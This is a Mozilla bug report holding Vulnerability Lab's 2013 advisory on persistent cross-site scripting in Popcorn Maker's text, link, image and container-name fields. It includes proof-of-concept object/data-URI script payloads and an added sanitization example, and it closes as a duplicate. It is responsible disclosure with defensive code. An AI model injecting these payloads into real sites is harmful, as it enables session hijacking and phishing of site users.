Bug 881697 - Multiple Persistent Vulnerabilities
Status: Closed; RESOLVED DUPLICATE of bug 866026
Opened 12 years ago; closed 12 years ago
Product/Component: Webmaker Graveyard :: Popcorn Maker (defect)
Tracking: Not tracked
Reporter: curtisk; Assigned: mgoodwin
Keywords: reporter-external; Whiteboard: [site:popcorn.webmaker.org][wsec-xss]
Attachments: 5 files
Date: Mon, 10 Jun 2013 20:28:04 +0100
From: Vulnerability Lab <admin@vulnerability-lab.com>
To: Mozilla Security <security@mozilla.org>
Subject: Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities
-----//-----
Title:
======
Mozilla Bug Bounty #7 PM - Multiple Persistent Vulnerabilities
Date:
=====
2013-06-10
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=966
VL-ID:
=====
966
Common Vulnerability Scoring System:
====================================
3.2
Introduction:
=============
Popcorn adds interactivity and context to online video, pulling the rest
of the web right into the action in real time.
Popcorn lets users link social media, news feeds, data visualizations
and other content directly to moving images.
The result is a new form of multimedia storytelling that lives and
breathes more like the web itself: interactive, social,
and unique each time. Popcorn is the result of ongoing collaboration
between filmmakers, developers and webmakers. Together
we explore how modern browser technologies like HTML5 can reshape moving
images online.
Popcorn Maker makes it easy to enhance, remix and share web video. Use
your web browser to combine video and audio
with content from the rest of the web — from text, links and maps to
pictures and live feeds.
(Copy of the Homepage: https://popcorn.webmaker.org &
https://mozillalabs.com/en-US/Popcorn/ )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple
persistent web vulnerabilities in the Mozilla Popcorn Maker (Webmaker)
Application.
Report-Timeline:
================
2013-06-06: Researcher Notification & Coordination
2013-06-10: Vendor Notification
2013-00-00: Vendor Response/Feedback
2013-00-00: Vendor Fix/Patch
2013-00-00: Public Disclosure
Status:
========
Unpublished
Affected Products:
==================
Mozilla
Product: Popcorn Maker (Webmaker) 2013 Q2
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple persistent input validation web vulnerabilities are detected in
the official Mozilla Popcorn Maker (WebMaker) Web Application.
The vulnerability allows an attacker to inject their own malicious script
code in the vulnerable module on the application side (persistent).
The persistent input validation vulnerabilities are located in the
events and layer modules when processing to add `Text`, `Link URL`,
`Image URL`, `video-container name` with malicious persistent script
code (js/html). The script code will be executed when the website
is processing to load the malicious manipulated web context of the input
ago.
Exploitation of the vulnerabilities requires no privileged application
user account but low or medium user interaction.
Successful exploitation results in persistent session hijacking of
Mozilla accounts, persistent phishing, persistent external malware loads
or redirects and persistent module web context manipulation.
Vulnerable Service(s):
[+] Mozilla Corp - Popcorn Maker (Webmaker.org - Mozilla Labs)
Vulnerable Module(s):
[+] Events
[+] Layer
Vulnerable Parameter(s):
[+] Text
[+] Link URL
[+] Image URL
[+] Video Container Name
Affected Section(s):
[+] Index Basic - Listing
Proof of Concept:
=================
The persistent input validation web vulnerabilities can be exploited by
remote attackers without a privileged application user account
and with low or medium user interaction. For demonstration or to
reproduce ...
--- Vulnerable Application Modules & Input Fields ---
Module: Events > Text
Input Fields: Text & Link URL
Module: Events > Image
Input Fields: Image URL & Link URL
Module: Events > Popup
Input Fields: Text & Link URL
Module: Layer > Listing
Input Fields: video-container name
Reference(s):
https://popcorn.webmaker.org/templates/basic/
Payload:
<object data="data:text/html,<script>alert(1337)</script>"></object>--benDE
PoC: Property-name (Text) & Link URL
<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value">
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(1337)</script>"></object>
</textarea>
<div style="top: 105%; left: 50%;" class="butter-tooltip shift-enter-tooltip-1370021564314 tooltip-no-hover">Press Shift+Enter for a new line.</div></fieldset>
<fieldset style="position: relative;" class="trackevent-property default input">
<label class="property-name">Link URL</label>
<input value="
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(1337)</script>"></object>
" data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip text-link-tooltip1370021564317 tooltip-no-hover">Links will be clickable when shared.</div></fieldset>
PoC: trackevent-property textarea - POP!
<fieldset style="position: relative;" class="trackevent-property textarea">
<label class="property-name">Text</label>
<textarea data-manifest-key="text" class="value">Pop!
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(1337)</script>"></object>
</textarea>
PoC: linkUrl & text
<label class="property-name">Link URL</label>
<input value="
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(VulnerabilityLab)</script>"></object>
  <object data="data:text/html,<script>alert(1337)</script>"></object>
" data-manifest-key="linkUrl" class="value" type="text">
<div style="top: 105%; left: 50%;" class="butter-tooltip text-link-tooltip1370021564317 tooltip-no-hover">Links will be clickable when shared.</div></fieldset>
Solution:
=========
Restrict the input fields with a secure char filter and parse the input
and output listing in the application.
Risk:
=====
The security risk of the persistent input validation web vulnerabilities
is estimated as medium.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri
(bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without
any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including
direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers
have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any
vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com -
www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com -
research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com -
news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab -
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team
& the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or
support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY ADMINISTRATION
CONTACT: admin@vulnerability-lab.com
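The advisory's Solution section asks for a character filter on the input fields and for parsing of the input and output listing. As an added example, not code from the advisory or from Popcorn Maker, the Node-runnable JavaScript below shows what that looks like for the field kinds the advisory names: free text is HTML-encoded before it reaches a template, URL fields are accepted only when they parse as absolute http(s) URLs, and unknown fields are dropped. The field names "text" and "linkUrl" are taken from the data-manifest-key values in the PoC; "imageUrl" and "name" are assumed names for the Image URL and video-container name fields, and the http(s)-only allowlist is the author's choice, not the project's policy. The sample event is constructed and reuses the payload quoted in the advisory.

```javascript
// Added example, not code from the advisory or from Popcorn Maker.
// Validates each track-event field by kind before it is stored or
// rendered, which is the fix the advisory's Solution section calls for.
// Field names "text" and "linkUrl" come from the PoC's data-manifest-key
// values; "imageUrl" and "name" are assumed names for the other two fields.

// Map every accepted field to the validation it needs. Anything not
// listed here is dropped rather than passed through untouched.
const FIELD_KINDS = {
  text: 'text',      // free text: HTML-encoded below
  name: 'text',      // video-container name (assumed field name)
  linkUrl: 'url',    // must be an absolute http(s) URL
  imageUrl: 'url',   // must be an absolute http(s) URL (assumed field name)
};

// Encode the characters that let text break out of an HTML text node or a
// double-quoted attribute value.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Accept a URL only if it parses as an absolute URL with an http(s) scheme.
// data:, javascript:, relative paths and the advisory's <object> payload
// all fail this check and come back as null.
function safeUrl(value) {
  let parsed;
  try {
    parsed = new URL(String(value).trim());
  } catch (err) {
    return null;
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
    return null;
  }
  return parsed.href;
}

// Validate one track event's options. Returns the cleaned copy plus the
// names of the fields that were rejected, so the editor UI can tell the
// user instead of silently storing something different.
function sanitizeTrackEvent(options) {
  const clean = {};
  const rejected = [];
  for (const [key, value] of Object.entries(options)) {
    const kind = FIELD_KINDS[key];
    if (kind === 'url') {
      const url = safeUrl(value);
      if (url === null) {
        rejected.push(key);
      } else {
        clean[key] = url;
      }
    } else if (kind === 'text') {
      clean[key] = escapeHtml(value);
    } else {
      rejected.push(key); // unknown field: never forwarded to the template
    }
  }
  return { clean, rejected };
}

// Render a text event the way a template might. Because the values were
// encoded, the <object> payload is displayed literally, not parsed.
function renderTextEvent(clean) {
  const text = clean.text || '';
  const body = clean.linkUrl
    ? `<a href="${escapeHtml(clean.linkUrl)}">${text}</a>`
    : text;
  return `<div class="popcorn-text">${body}</div>`;
}

// Constructed sample input reusing the payload quoted in the advisory.
const PAYLOAD = '<object data="data:text/html,<script>alert(1337)</script>"></object>';
const SAMPLE_EVENT = {
  text: 'Pop! ' + PAYLOAD,
  linkUrl: PAYLOAD,
  imageUrl: 'https://example.org/still.png',
  onclick: 'alert(1)', // not a known field, so it is dropped
};

const RESULT = sanitizeTrackEvent(SAMPLE_EVENT);
console.log(JSON.stringify(RESULT, null, 2));
console.log(renderTextEvent(RESULT.clean));
```

Encoding the text field at validation time is a deliberate simplification; a template engine that encodes on output would let the raw text be stored and still render safely. The URL check is the part that matters for the Link URL and Image URL fields, since an HTML-encoded `data:` or `javascript:` URL is still an active URL once it lands in an `href` or `src` attribute.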
Comment 6 (Reporter, 12 years ago):
assigned to mgoodwin for verification
https://wiki.mozilla.org/Security/Web_Bug_Rotation#Web_Bug_Verification
Assignee: nobody → mgoodwin
Updated by Assignee, 12 years ago:
Status: UNCONFIRMED → RESOLVED
Closed: 12 years ago
Resolution: --- → DUPLICATE
Whiteboard: [reporter-external][verif?] → [site:popcorn.webmaker.org][wsec-xss]
Comment 8 (12 years ago):
Hello Mark Goodwin,
the issue has been marked as duplicate in our database after you provided the details. The issue will be deleted from our upcomings and ensures the real researcher gets the full credits for reporting the issue.
Thanks Mark. We appreciate your cooperation and web vulnerability coordination.
~Benjamin Kunz Mejri
Updated 11 years ago:
Group: websites-security
Flags: sec-bounty-
Updated 1 year ago:
Keywords: reporter-external